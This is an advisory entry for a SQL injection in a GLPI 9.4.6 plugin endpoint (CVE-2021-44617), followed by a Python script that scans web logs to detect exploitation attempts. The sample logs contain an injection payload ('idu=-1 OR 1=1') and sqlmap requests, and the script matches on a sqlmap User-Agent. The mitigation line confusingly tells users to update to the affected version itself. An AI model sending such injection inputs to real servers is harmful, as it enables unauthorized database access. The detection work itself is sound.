Vendor: GLPI
By: Joas Antonio
CVSS: 9.8 (CRITICAL)
Type: SQL Injection
CWE: 89
Product Name: GLPI
Affected Version From: 9.4.6
Affected Version To: 9.4.6
Patch Exists: YES
Related CVE: CVE-2021-44617
CPE: a:glpi-project:glpi:9.4.6
Platforms Tested: Windows/Linux
2021
Baixar GLPI Project 9.4.6 – SQLi
This exploit targets Baixar GLPI Project 9.4.6. It is a SQL injection vulnerability that allows an attacker to execute malicious SQL queries on the vulnerable system. It is triggered by sending a specially crafted request to the plugins/ramo/ramoapirest.php/getOutdated?idu=-1 endpoint. The attacker can then use the sqlmap tool to enumerate the databases on the vulnerable system.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version of GLPI Project 9.4.6.
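Detection: the Python script below is an added example, not code from the original entry or from the GLPI project. It scans web server access logs for requests to the getOutdated endpoint described above and flags those whose idu value is not a single non-negative integer or that carry a sqlmap User-Agent. The "combined" log format, the assumption that a legitimate idu is a plain integer id, and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; matched case-insensitively under any install prefix.
ENDPOINT = "plugins/ramo/ramoapirest.php/getoutdated"
# Apache/nginx "combined" access log format (assumed log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def check_line(line):
    """Return (client_ip, idu_values, reasons) for a suspicious hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if ENDPOINT not in unquote(url.path).lower():
        return None
    # parse_qs percent-decodes values, so encoded payloads are compared in clear form.
    idu = parse_qs(url.query, keep_blank_values=True).get("idu", [])
    reasons = []
    # Assumption: a legitimate idu is a single non-negative integer id.
    if len(idu) != 1 or not re.fullmatch(r"[0-9]+", idu[0]):
        reasons.append("idu is not a single non-negative integer")
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap User-Agent")
    return (m["ip"], idu, reasons) if reasons else None

def scan(lines):
    """Return every suspicious hit found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2022:10:00:00 +0000] "GET /glpi/plugins/ramo/ramoapirest.php/getOutdated?idu=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2022:10:01:00 +0000] "GET /glpi/plugins/ramo/ramoapirest.php/getOutdated?idu=-1 HTTP/1.1" 200 20 "-" "sqlmap/1.5 (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Jan/2022:10:01:05 +0000] "GET /glpi/plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%201%3D1 HTTP/1.1" 200 20 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Jan/2022:10:02:00 +0000] "GET /glpi/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, idu, reasons in scan(SAMPLE_LOG):
        print(ip, idu, "; ".join(reasons))
```

Point it at real logs with scan(open(path)); any hit on this endpoint on a host that has not yet been patched warrants a review of the database for unauthorized access.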